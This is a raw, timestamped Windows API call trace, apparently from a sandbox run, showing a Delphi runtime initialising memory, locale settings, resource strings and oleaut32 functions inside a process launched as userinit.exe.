[0109.984] GlobalUnlock (hMem=0x58000c) returned 0
[0109.984] GlobalReAlloc (hMem=0x58000c, dwBytes=0x106000, uFlags=0x2) returned 0x58000c
[0110.012] GlobalLock (hMem=0x58000c) returned 0x2820020
[0110.012] GlobalHandle (pMem=0x2820020) returned 0x58000c
[0110.012] GlobalUnlock (hMem=0x58000c) returned 0
[0110.012] GlobalReAlloc (hMem=0x58000c, dwBytes=0x108000, uFlags=0x2) returned 0x58000c
[0110.085] GlobalLock (hMem=0x58000c) returned 0x2930020
[0110.086] GlobalHandle (pMem=0x2930020) returned 0x58000c
[0110.086] GlobalUnlock (hMem=0x58000c) returned 0
[0110.086] GlobalReAlloc (hMem=0x58000c, dwBytes=0x10a000, uFlags=0x2) returned 0x58000c
[0110.107] GlobalLock (hMem=0x58000c) returned 0x2820020
[0110.108] GlobalHandle (pMem=0x2820020) returned 0x58000c
[0110.108] GlobalUnlock (hMem=0x58000c) returned 0
[0110.108] GlobalReAlloc (hMem=0x58000c, dwBytes=0x10c000, uFlags=0x2) returned 0x58000c
[0110.177] GlobalLock (hMem=0x58000c) returned 0x2930020
[0110.177] VirtualAlloc (lpAddress=0x0, dwSize=0x110000, flAllocationType=0x2000, flProtect=0x1) returned 0x2820000
[0110.177] VirtualAlloc (lpAddress=0x2820000, dwSize=0x10c000, flAllocationType=0x1000, flProtect=0x4) returned 0x2820000
[0110.251] GetKeyboardType (nTypeFlag=0) returned 4
[0110.251] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0110.251] GetStartupInfoA (in: lpStartupInfo=0xcf3c0 | out: lpStartupInfo=0xcf3c0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0110.251] GetVersion () returned 0x1db10106
[0110.251] GetVersion () returned 0x1db10106
[0110.251] GetCurrentThreadId () returned 0xfa8
[0110.251] GetModuleFileNameA (in: hModule=0x2a40000, lpFilename=0xceebc, nSize=0x105 | out: lpFilename="\xcc\xee\x0c" (normalized: "c:\\windows\\system32\\ìî\x0c")) returned 0x0
[0110.251] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xced97, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0110.251] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xceeac | out: phkResult=0xceeac*=0x0) returned 0x2
[0110.251] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xceeac | out: phkResult=0xceeac*=0x0) returned 0x2
[0110.251] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xceeac | out: phkResult=0xceeac*=0x0) returned 0x2
[0110.251] lstrcpynA (in: lpString1=0xced97, lpString2="\xcc\xee\x0c", iMaxLength=261 | out: lpString1="\xcc\xee\x0c") returned="\xcc\xee\x0c"
[0110.251] GetThreadLocale () returned 0x409
[0110.251] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0xceea7, cchData=5 | out: lpLCData="ENU") returned 4
[0110.251] lstrlenA (lpString="\xcc\xee\x0c") returned 3
[0110.251] LoadStringA (in: hInstance=0x2a40000, uID=0xffc4, lpBuffer=0xcefe0, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0110.252] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x20dcc0
[0110.252] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x2b60000
[0110.252] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x20ecc0
[0110.252] VirtualAlloc (lpAddress=0x2b60000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2b60000
[0110.252] LoadStringA (in: hInstance=0x2a40000, uID=0xffc3, lpBuffer=0xcefe0, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0110.252] LoadStringA (in: hInstance=0x2a40000, uID=0xffc1, lpBuffer=0xcefe0, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0110.252] LoadStringA (in: hInstance=0x2a40000, uID=0xffc2, lpBuffer=0xcefe0, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0110.252] LoadStringA (in: hInstance=0x2a40000, uID=0xffd4, lpBuffer=0xcefe0, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0110.252] LoadStringA (in: hInstance=0x2a40000, uID=0xffdd, lpBuffer=0xcefe0, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0110.252] LoadStringA (in: hInstance=0x2a40000, uID=0xffd3, lpBuffer=0xcefe0, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0110.252] LoadStringA (in: hInstance=0x2a40000, uID=0xffd0, lpBuffer=0xcefe0, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0110.252] LoadStringA (in: hInstance=0x2a40000, uID=0xffd7, lpBuffer=0xcefe0, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0110.252] LoadStringA (in: hInstance=0x2a40000, uID=0xffd6, lpBuffer=0xcefe0, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0110.252] LoadStringA (in: hInstance=0x2a40000, uID=0xffe8, lpBuffer=0xcefe0, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0110.252] LoadStringA (in: hInstance=0x2a40000, uID=0xffe9, lpBuffer=0xcefe0, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0110.252] LoadStringA (in: hInstance=0x2a40000, uID=0xffea, lpBuffer=0xcefe0, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0110.253] LoadStringA (in: hInstance=0x2a40000, uID=0xffe7, lpBuffer=0xcefe0, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0110.253] LoadStringA (in: hInstance=0x2a40000, uID=0xffe5, lpBuffer=0xcefe0, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0110.253] LoadStringA (in: hInstance=0x2a40000, uID=0xffe3, lpBuffer=0xcefe0, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0110.253] LoadStringA (in: hInstance=0x2a40000, uID=0xffe2, lpBuffer=0xcefe0, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0110.253] LoadStringA (in: hInstance=0x2a40000, uID=0xffe1, lpBuffer=0xcefe0, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0110.253] LoadStringA (in: hInstance=0x2a40000, uID=0xffe0, lpBuffer=0xcefe0, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0110.253] LoadStringA (in: hInstance=0x2a40000, uID=0xffff, lpBuffer=0xcefe0, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0110.253] LoadStringA (in: hInstance=0x2a40000, uID=0xfffe, lpBuffer=0xcefe0, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0110.253] LoadStringA (in: hInstance=0x2a40000, uID=0xfffd, lpBuffer=0xcefe0, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0110.253] LoadStringA (in: hInstance=0x2a40000, uID=0xfffc, lpBuffer=0xcefe0, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0110.253] LoadStringA (in: hInstance=0x2a40000, uID=0xfffb, lpBuffer=0xcefe0, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0110.253] LoadStringA (in: hInstance=0x2a40000, uID=0xfffa, lpBuffer=0xcefe0, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0110.253] LoadStringA (in: hInstance=0x2a40000, uID=0xfff9, lpBuffer=0xcefe0, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0110.253] LoadStringA (in: hInstance=0x2a40000, uID=0xfff8, lpBuffer=0xcefe0, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0110.253] LoadStringA (in: hInstance=0x2a40000, uID=0xfff7, lpBuffer=0xcefe0, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0110.253] LoadStringA (in: hInstance=0x2a40000, uID=0xfff6, lpBuffer=0xcefe0, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0110.253] LoadStringA (in: hInstance=0x2a40000, uID=0xfff4, lpBuffer=0xcefcc, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0110.253] LoadStringA (in: hInstance=0x2a40000, uID=0xffe4, lpBuffer=0xcefcc, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0110.253] GetVersionExA (in: lpVersionInformation=0xcf364*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x2a40000, dwMinorVersion=0x0, dwBuildNumber=0x28, dwPlatformId=0x65636341, szCSDVersion="ssibleObjectFromr<¤\x02·\"¤\x02üó\x0c") | out: lpVersionInformation=0xcf364*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0110.253] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0110.253] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0110.253] GetThreadLocale () returned 0x409
[0110.253] GetThreadLocale () returned 0x409
[0110.253] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0xcf23c, cchData=256 | out: lpLCData="Jan") returned 4
[0110.253] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0xcf23c, cchData=256 | out: lpLCData="January") returned 8
[0110.253] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0xcf23c, cchData=256 | out: lpLCData="Feb") returned 4
[0110.253] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0xcf23c, cchData=256 | out: lpLCData="February") returned 9
[0110.253] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0xcf23c, cchData=256 | out: lpLCData="Mar") returned 4
[0110.254] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0xcf23c, cchData=256 | out: lpLCData="March") returned 6
[0110.254] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0xcf23c, cchData=256 | out: lpLCData="Apr") returned 4
[0110.254] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0xcf23c, cchData=256 | out: lpLCData="April") returned 6
[0110.254] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0xcf23c, cchData=256 | out: lpLCData="May") returned 4
[0110.254] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0xcf23c, cchData=256 | out: lpLCData="May") returned 4
[0110.254] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0xcf23c, cchData=256 | out: lpLCData="Jun") returned 4
[0110.254] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0xcf23c, cchData=256 | out: lpLCData="June") returned 5
[0110.254] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0xcf23c, cchData=256 | out: lpLCData="Jul") returned 4
[0110.254] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0xcf23c, cchData=256 | out: lpLCData="July") returned 5
[0110.254] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0xcf23c, cchData=256 | out: lpLCData="Aug") returned 4
[0110.254] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0xcf23c, cchData=256 | out: lpLCData="August") returned 7
[0110.254] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0xcf23c, cchData=256 | out: lpLCData="Sep") returned 4
[0110.254] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0xcf23c, cchData=256 | out: lpLCData="September") returned 10
[0110.254] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0xcf23c, cchData=256 | out: lpLCData="Oct") returned 4
[0110.254] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0xcf23c, cchData=256 | out: lpLCData="October") returned 8
[0110.254] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0xcf23c, cchData=256 | out: lpLCData="Nov") returned 4
[0110.254] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0xcf23c, cchData=256 | out: lpLCData="November") returned 9
[0110.254] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0xcf23c, cchData=256 | out: lpLCData="Dec") returned 4
[0110.254] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0xcf23c, cchData=256 | out: lpLCData="December") returned 9
[0110.254] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0xcf23c, cchData=256 | out: lpLCData="Sun") returned 4
[0110.254] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0xcf23c, cchData=256 | out: lpLCData="Sunday") returned 7
[0110.254] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0xcf23c, cchData=256 | out: lpLCData="Mon") returned 4
[0110.254] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0xcf23c, cchData=256 | out: lpLCData="Monday") returned 7
[0110.254] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0xcf23c, cchData=256 | out: lpLCData="Tue") returned 4
[0110.254] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0xcf23c, cchData=256 | out: lpLCData="Tuesday") returned 8
[0110.254] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0xcf23c, cchData=256 | out: lpLCData="Wed") returned 4
[0110.254] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0xcf23c, cchData=256 | out: lpLCData="Wednesday") returned 10
[0110.254] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0xcf23c, cchData=256 | out: lpLCData="Thu") returned 4
[0110.254] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0xcf23c, cchData=256 | out: lpLCData="Thursday") returned 9
[0110.254] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0xcf23c, cchData=256 | out: lpLCData="Fri") returned 4
[0110.254] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0xcf23c, cchData=256 | out: lpLCData="Friday") returned 7
[0110.254] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0xcf23c, cchData=256 | out: lpLCData="Sat") returned 4
[0110.254] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0xcf23c, cchData=256 | out: lpLCData="Saturday") returned 9
[0110.254] GetThreadLocale () returned 0x409
[0110.254] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0xcf298, cchData=256 | out: lpLCData="$") returned 2
[0110.254] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0xcf298, cchData=256 | out: lpLCData="0") returned 2
[0110.254] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0xcf298, cchData=256 | out: lpLCData="0") returned 2
[0110.254] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0xcf390, cchData=2 | out: lpLCData=",") returned 2
[0110.255] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0xcf390, cchData=2 | out: lpLCData=".") returned 2
[0110.255] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0xcf298, cchData=256 | out: lpLCData="2") returned 2
[0110.255] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0xcf390, cchData=2 | out: lpLCData="/") returned 2
[0110.255] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0xcf298, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0110.255] GetThreadLocale () returned 0x409
[0110.255] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0xcf264, cchData=256 | out: lpLCData="1") returned 2
[0110.255] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0xcf298, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0110.255] GetThreadLocale () returned 0x409
[0110.255] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0xcf264, cchData=256 | out: lpLCData="1") returned 2
[0110.255] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0xcf390, cchData=2 | out: lpLCData=":") returned 2
[0110.255] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0xcf298, cchData=256 | out: lpLCData="AM") returned 3
[0110.255] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0xcf298, cchData=256 | out: lpLCData="PM") returned 3
[0110.255] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0xcf298, cchData=256 | out: lpLCData="0") returned 2
[0110.255] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0xcf298, cchData=256 | out: lpLCData="0") returned 2
[0110.255] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0xcf298, cchData=256 | out: lpLCData="0") returned 2
[0110.255] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0xcf390, cchData=2 | out: lpLCData=",") returned 2
[0110.255] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0110.255] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0110.255] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0110.255] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0110.255] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0110.255] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0110.256] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0110.256] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0110.256] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0110.256] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0110.256] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0110.256] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0110.256] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0110.256] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0110.256] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0110.256] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0110.256] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0110.256] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0110.256] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0110.256] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0110.257] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0110.257] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0110.257] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0110.257] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xa8
[0110.257] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xa0
[0110.257] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xac
[0110.257] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0110.257] GetDC (hWnd=0x0) returned 0x1201087d
[0110.257] GetDeviceCaps (hdc=0x1201087d, index=90) returned 96
[0110.257] ReleaseDC (hWnd=0x0, hDC=0x1201087d) returned 1
[0110.257] GetDC (hWnd=0x0) returned 0x1201087d
[0110.257] GetDeviceCaps (hdc=0x1201087d, index=104) returned 0
[0110.257] ReleaseDC (hWnd=0x0, hDC=0x1201087d) returned 1
[0110.257] CreatePalette (plpal=0xceff4) returned 0x3a08085a
[0110.257] GetStockObject (i=7) returned 0x1b00017
[0110.257] GetStockObject (i=5) returned 0x1900015
[0110.257] GetStockObject (i=13) returned 0x18a002e
[0110.257] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0110.257] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0110.258] LoadStringA (in: hInstance=0x2a40000, uID=0xff3d, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0110.258] LoadStringA (in: hInstance=0x2a40000, uID=0xff3c, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0110.258] LoadStringA (in: hInstance=0x2a40000, uID=0xff3b, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0110.258] LoadStringA (in: hInstance=0x2a40000, uID=0xff3a, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0110.258] LoadStringA (in: hInstance=0x2a40000, uID=0xff39, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0110.258] LoadStringA (in: hInstance=0x2a40000, uID=0xff38, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0110.258] LoadStringA (in: hInstance=0x2a40000, uID=0xff37, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0110.258] LoadStringA (in: hInstance=0x2a40000, uID=0xff36, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0110.258] LoadStringA (in: hInstance=0x2a40000, uID=0xff35, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0110.258] LoadStringA (in: hInstance=0x2a40000, uID=0xff34, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0110.258] LoadStringA (in: hInstance=0x2a40000, uID=0xff33, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0110.258] LoadStringA (in: hInstance=0x2a40000, uID=0xff32, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0110.258] LoadStringA (in: hInstance=0x2a40000, uID=0xff31, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0110.258] LoadStringA (in: hInstance=0x2a40000, uID=0xff30, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0110.258] LoadStringA (in: hInstance=0x2a40000, uID=0xff4f, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0110.258] LoadStringA (in: hInstance=0x2a40000, uID=0xff4e, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0110.258] LoadStringA (in: hInstance=0x2a40000, uID=0xff4d, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0110.258] LoadStringA (in: hInstance=0x2a40000, uID=0xff4c, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0110.258] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0110.258] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0110.258] GetCurrentThreadId () returned 0xfa8
[0110.258] GlobalAddAtomA (lpString="WndProcPtr02A4000000000FA8") returned 0xc140
[0110.259] LoadStringA (in: hInstance=0x2a40000, uID=0xfefc, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0110.259] LoadStringA (in: hInstance=0x2a40000, uID=0xfefb, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0110.259] LoadStringA (in: hInstance=0x2a40000, uID=0xfefa, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0110.259] LoadStringA (in: hInstance=0x2a40000, uID=0xfef9, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0110.259] LoadStringA (in: hInstance=0x2a40000, uID=0xfef8, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0110.259] LoadStringA (in: hInstance=0x2a40000, uID=0xfef7, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0110.259] LoadStringA (in: hInstance=0x2a40000, uID=0xfef6, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0110.259] LoadStringA (in: hInstance=0x2a40000, uID=0xfef5, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0110.259] LoadStringA (in: hInstance=0x2a40000, uID=0xfef4, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0110.259] LoadStringA (in: hInstance=0x2a40000, uID=0xfef3, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0110.259] LoadStringA (in: hInstance=0x2a40000, uID=0xfef2, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0110.259] LoadStringA (in: hInstance=0x2a40000, uID=0xfef1, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0110.259] LoadStringA (in: hInstance=0x2a40000, uID=0xfef0, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0110.259] LoadStringA (in: hInstance=0x2a40000, uID=0xff0f, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0110.259] LoadStringA (in: hInstance=0x2a40000, uID=0xff0e, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0110.259] LoadStringA (in: hInstance=0x2a40000, uID=0xff0d, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0110.259] LoadStringA (in: hInstance=0x2a40000, uID=0xff0c, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0110.259] LoadStringA (in: hInstance=0x2a40000, uID=0xff0b, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0110.259] LoadStringA (in: hInstance=0x2a40000, uID=0xff0a, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0110.259] LoadStringA (in: hInstance=0x2a40000, uID=0xff09, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0110.259] LoadStringA (in: hInstance=0x2a40000, uID=0xff08, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0110.259] LoadStringA (in: hInstance=0x2a40000, uID=0xff07, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0110.259] LoadStringA (in: hInstance=0x2a40000, uID=0xff06, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0110.259] LoadStringA (in: hInstance=0x2a40000, uID=0xff05, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0110.259] LoadStringA (in: hInstance=0x2a40000, uID=0xff04, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0110.259] LoadStringA (in: hInstance=0x2a40000, uID=0xff03, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0110.259] LoadStringA (in: hInstance=0x2a40000, uID=0xff02, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0110.259] LoadStringA (in: hInstance=0x2a40000, uID=0xff01, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0110.259] LoadStringA (in: hInstance=0x2a40000, uID=0xff00, lpBuffer=0xceff0, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
